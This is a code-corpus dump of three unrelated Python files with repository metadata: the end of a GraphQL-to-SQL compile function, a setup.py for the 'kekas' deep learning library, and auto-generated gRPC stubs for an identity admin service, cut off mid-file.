int, gql: str, tokens: Optional[List[Tuple[int, int, int, str]]], substitutions: Optional[Dict[str, Tuple[str, int, int]]], operation_name: str=None, variables: Optional[Mapping[str, object]]=None, ) -> CompiledOperation: db = await self._get_database(dbver) if tokens is None: ast = graphql.parse_text(gql) else: ast = graphql.parse_tokens(gql, tokens) op = graphql.translate_ast( db.gqlcore, ast, variables=variables, substitutions=substitutions, operation_name=operation_name) ir = qlcompiler.compile_ast_to_ir( op.edgeql_ast, schema=db.schema, options=qlcompiler.CompilerOptions( json_parameters=True, ), ) if ir.cardinality.is_multi(): raise errors.ResultCardinalityMismatchError( f'compiled GrqphQL query has cardinality {ir.cardinality}, ' f'expected ONE') sql_text, argmap = pg_compiler.compile_ir_to_sql( ir, pretty=debug.flags.edgeql_compile, expected_cardinality_one=True, output_format=pg_compiler.OutputFormat.JSON) args = [None] * len(argmap) for argname, param in argmap.items(): args[param.index - 1] = argname sql_bytes = sql_text.encode() sql_hash = self._hash_sql(sql_bytes) return CompiledOperation( sql=sql_bytes, sql_hash=sql_hash, sql_args=args, dbver=dbver, cacheable=op.cacheable, cache_deps_vars=op.cache_deps_vars, variables=op.variables_desc, )
28.167939
76
0.649593
090cd2d1629e8f800772c74341be56047a035cb3
882
py
Python
setup.py
alxmamaev/kekas
f0d8f9643e89757ae44a679ecba64454b1236e10
[ "MIT" ]
1
2019-03-13T13:58:40.000Z
2019-03-13T13:58:40.000Z
setup.py
alxmamaev/kekas
f0d8f9643e89757ae44a679ecba64454b1236e10
[ "MIT" ]
null
null
null
setup.py
alxmamaev/kekas
f0d8f9643e89757ae44a679ecba64454b1236e10
[ "MIT" ]
null
null
null
import setuptools with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( name="kekas", version="0.1.8", author="Aleksandr Belskikh", author_email="belskikh.aleksandr@gmail.com", description="Jast another DL library.", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/belskikh/kekas", classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], license="MIT", python_requires=">=3.6.0", packages=setuptools.find_packages(), install_requires=[ "pandas>=0.22", "numpy>=1.14.6", "tensorboardX>=1.6", "torch>=0.4.1", "torchvision>=0.2.1", "tqdm>=4.29.1", "scikit-learn>=0.20" ] )
25.941176
50
0.602041
686da7dff3cdf3899c62281f75d6dbd9570f5cf2
64,833
py
Python
auth3/identity/admin/admin_pb2_grpc.py
auth3-dev/python-sdk
0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9
[ "Apache-2.0" ]
null
null
null
auth3/identity/admin/admin_pb2_grpc.py
auth3-dev/python-sdk
0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9
[ "Apache-2.0" ]
null
null
null
auth3/identity/admin/admin_pb2_grpc.py
auth3-dev/python-sdk
0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9
[ "Apache-2.0" ]
null
null
null
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! """Client and server classes corresponding to protobuf-defined services.""" import grpc from auth3.identity.admin import admin_pb2 as devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2 class AdminStub(object): """Missing associated documentation comment in .proto file.""" def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.CreateIdentity = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/CreateIdentity', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.FromString, ) self.GetIdentity = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentity', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.FromString, ) self.GetIdentitiesByAttribute = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentitiesByAttribute', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.FromString, ) self.GetIdentities = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentities', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.FromString, ) self.UpdateIdentity = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdentity', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.FromString, ) self.DeleteIdentity = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdentity', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.FromString, ) self.GetAddresses = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetAddresses', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.FromString, ) self.GetAddress = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetAddress', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.FromString, ) self.UpdateAddress = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/UpdateAddress', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.FromString, ) self.GetTraits = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetTraits', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.FromString, ) self.UpdateTraits = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/UpdateTraits', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.FromString, ) self.GetCredentials = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetCredentials', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.FromString, ) self.UpdateCredential = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/UpdateCredential', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.FromString, ) self.GetIdentityLoginAttempts = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentityLoginAttempts', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.FromString, ) self.CreateConnection = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/CreateConnection', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.FromString, ) self.GetConnections = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetConnections', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.FromString, ) self.UpdateConnection = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/UpdateConnection', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.FromString, ) self.DeleteConnection = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/DeleteConnection', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.FromString, ) self.CreateIdSchema = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/CreateIdSchema', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.FromString, ) self.GetIdSchemas = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchemas', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.FromString, ) self.GetIdSchema = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchema', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.FromString, ) self.GetDefaultIdSchema = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetDefaultIdSchema', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.FromString, ) self.UpdateIdSchema = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdSchema', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.FromString, ) self.MarkDefaultIdSchema = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/MarkDefaultIdSchema', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.FromString, ) self.DeleteIdSchema = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdSchema', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.FromString, ) self.CreateOAuth2Client = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/CreateOAuth2Client', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.FromString, ) self.GetOAuth2Clients = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetOAuth2Clients', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.FromString, ) self.UpdateOAuth2Client = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/UpdateOAuth2Client', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.FromString, ) self.DeleteOAuth2Client = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/DeleteOAuth2Client', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.FromString, ) self.GetEmailsSetup = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetEmailsSetup', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.FromString, ) self.UpdateEmailsSetup = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/UpdateEmailsSetup', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.FromString, ) self.GetUserBaseStatistics = channel.unary_unary( '/depot.devtools.auth.v0.identity.admin.Admin/GetUserBaseStatistics', request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.SerializeToString, response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.FromString, ) class AdminServicer(object): """Missing associated documentation comment in .proto file.""" def CreateIdentity(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetIdentity(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetIdentitiesByAttribute(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetIdentities(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def UpdateIdentity(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def DeleteIdentity(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetAddresses(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetAddress(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def UpdateAddress(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetTraits(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def UpdateTraits(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetCredentials(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def UpdateCredential(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetIdentityLoginAttempts(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def CreateConnection(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetConnections(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def UpdateConnection(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def DeleteConnection(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def CreateIdSchema(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetIdSchemas(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetIdSchema(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetDefaultIdSchema(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def UpdateIdSchema(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def MarkDefaultIdSchema(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def DeleteIdSchema(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def CreateOAuth2Client(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetOAuth2Clients(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def UpdateOAuth2Client(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def DeleteOAuth2Client(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetEmailsSetup(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def UpdateEmailsSetup(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def GetUserBaseStatistics(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_AdminServicer_to_server(servicer, server): rpc_method_handlers = { 'CreateIdentity': grpc.unary_unary_rpc_method_handler( servicer.CreateIdentity, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.SerializeToString, ), 'GetIdentity': grpc.unary_unary_rpc_method_handler( servicer.GetIdentity, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.SerializeToString, ), 'GetIdentitiesByAttribute': grpc.unary_unary_rpc_method_handler( servicer.GetIdentitiesByAttribute, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.SerializeToString, ), 'GetIdentities': grpc.unary_unary_rpc_method_handler( servicer.GetIdentities, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.SerializeToString, ), 'UpdateIdentity': grpc.unary_unary_rpc_method_handler( servicer.UpdateIdentity, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.SerializeToString, ), 'DeleteIdentity': grpc.unary_unary_rpc_method_handler( servicer.DeleteIdentity, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.SerializeToString, ), 'GetAddresses': grpc.unary_unary_rpc_method_handler( servicer.GetAddresses, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.SerializeToString, ), 'GetAddress': grpc.unary_unary_rpc_method_handler( servicer.GetAddress, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.SerializeToString, ), 'UpdateAddress': grpc.unary_unary_rpc_method_handler( servicer.UpdateAddress, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.SerializeToString, ), 'GetTraits': grpc.unary_unary_rpc_method_handler( servicer.GetTraits, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.SerializeToString, ), 'UpdateTraits': grpc.unary_unary_rpc_method_handler( servicer.UpdateTraits, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.SerializeToString, ), 'GetCredentials': grpc.unary_unary_rpc_method_handler( servicer.GetCredentials, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.SerializeToString, ), 'UpdateCredential': grpc.unary_unary_rpc_method_handler( servicer.UpdateCredential, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.SerializeToString, ), 'GetIdentityLoginAttempts': grpc.unary_unary_rpc_method_handler( servicer.GetIdentityLoginAttempts, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.SerializeToString, ), 'CreateConnection': grpc.unary_unary_rpc_method_handler( servicer.CreateConnection, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.SerializeToString, ), 'GetConnections': grpc.unary_unary_rpc_method_handler( servicer.GetConnections, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.SerializeToString, ), 'UpdateConnection': grpc.unary_unary_rpc_method_handler( servicer.UpdateConnection, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.SerializeToString, ), 'DeleteConnection': grpc.unary_unary_rpc_method_handler( servicer.DeleteConnection, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.SerializeToString, ), 'CreateIdSchema': grpc.unary_unary_rpc_method_handler( servicer.CreateIdSchema, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.SerializeToString, ), 'GetIdSchemas': grpc.unary_unary_rpc_method_handler( servicer.GetIdSchemas, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.SerializeToString, ), 'GetIdSchema': grpc.unary_unary_rpc_method_handler( servicer.GetIdSchema, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.SerializeToString, ), 'GetDefaultIdSchema': grpc.unary_unary_rpc_method_handler( servicer.GetDefaultIdSchema, request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.FromString, response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.SerializeToString, ), 'UpdateIdSchema': grpc.unary_unary_rpc_method_handler( servicer.UpdateIdSchema, 